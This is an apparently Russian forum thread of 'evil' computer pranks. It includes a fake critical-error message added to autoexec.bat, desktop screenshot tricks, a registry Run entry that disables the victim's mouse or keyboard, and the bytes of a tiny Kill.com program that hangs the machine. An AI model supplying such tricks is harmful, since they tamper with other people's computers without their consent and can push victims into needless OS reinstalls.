![]() |
|
||||||||||
|
|||||
|
  акула
|
учет вести. детей... :)
|
|
|||||
|
Ales, не знаю, я эту прогу сам не запускал. А вот если использовать ее в качестве мести, то даже к лучшему, если еще ко всему прочему жертве придется ОСь переставлять.
2Cplus: ему его правительство подарило, как отцу-герою. А он сказал: "рад стараться! Даешь три смены, вместо двух!"
|
Поясняю. 14 февраля мне исполняется 19 лет и сколько я себя помню у меня был компьютер.... В свое время я боролся еще с такими, что без хардов поставлялись, а такое ранне знание и развитие объясняется просто: у меня мама - инженер-программист по профессии и отчим работал там же....
Так что..... С асмом тогда я конечно не очень хорошо работал, но несколько вирей накропал в свое время... ну и много чего. Учась в 10-м классе я написал дипломную работу человеку с пятого курса (это прога и описание страниц 30...). В общем, не люблю хвастаться, но с этими железяками давно дружу ))) Короче, я не обидчивый... слава Богу....
|
F1
|
Цитата:
![]() 2Demon1983: силен! ![]()
|
[+3 23.04.07]
|
Типа очень злой прикол----
В автоекзек.бат прописываем в начало строчку echo c любым радуещем вас текстом типа System halted. Critical error.You need reinstal windows. Дальше пишем стоп и выход по Ctrl Z. Человек грузит машину и после теста системы и таблиц загрузки видит это сообщение на черном досовом фоне... шок гарантирован... настоятельно рекомендую находится рядом при этоом... так как большинство начинает судорожно переставлять винду.... а это ведь не наша цель... наша цель ЮМОР. Опять же можете с задумчивым видом ченить понажимать, пару раз перегрузить а потом втихую нажать Ctrl Z и репутация крутого хакера гарантирована ![]()
|
2_Magic Wand
Прикол про десктоп довольно старый, но на Винде 95 я просто заменял фоновую картинку картинкой с открытым оком форматирования винчестера, где предварительно дорисовывал в фотошопе начало формата. Затем, что бы сделать, будто бы комп завис, выделяю все значки, и утаскиваю их вниз, кроме одного, расположенного так же внизу (при нажатиии Ctrl + A все значки выделяются и не представляется труда вытянуть их из-за края десктопа. Трудно, но в тех условиях было прикольно.
|
2Demon: а маманя у тебя романтик - в День Всех Влюбленных родила.
![]()
|
Maks, самое смешное то, что сама она родилась 8 марта, а брат мой младший родился 8 января (почти рождество)
Так что я ещё самый безобидный из семьи....Правда 14 февраля все поздраваляют, девушки особенно добрые Так приятно, чёрт подери....
|
Да ладно вам, самая смешная приколюха на компе это убрать мыху, шобы ее было не видно, сделать снапшот экрана и поместить на рабочий стол, затем поставить галочку "ПрятатьЗначки если раб стол в АктивДесктоп" и переместить панельпуск в другое место минимизировав его нафиг.
в реестре еще можно напистать в РУНе отрубание мыхи(еще лучше клавы) или запуск вот такой злобной проги (это для крайней степени жестокости 8)))) : создаем Kill.com и в нем пишем FA, F4, EB, FC успех гарантирован. Правда запуск Kill.com приводит к оч. интересным резуьтатам и комп просто свочивет ковик в Null... ЗЫ: Я не злобный, я только учусь ![]()
Часовой пояс GMT +4, время: 20:47. |
|
|
« Предыдущая тема | Следующая тема » |
|
|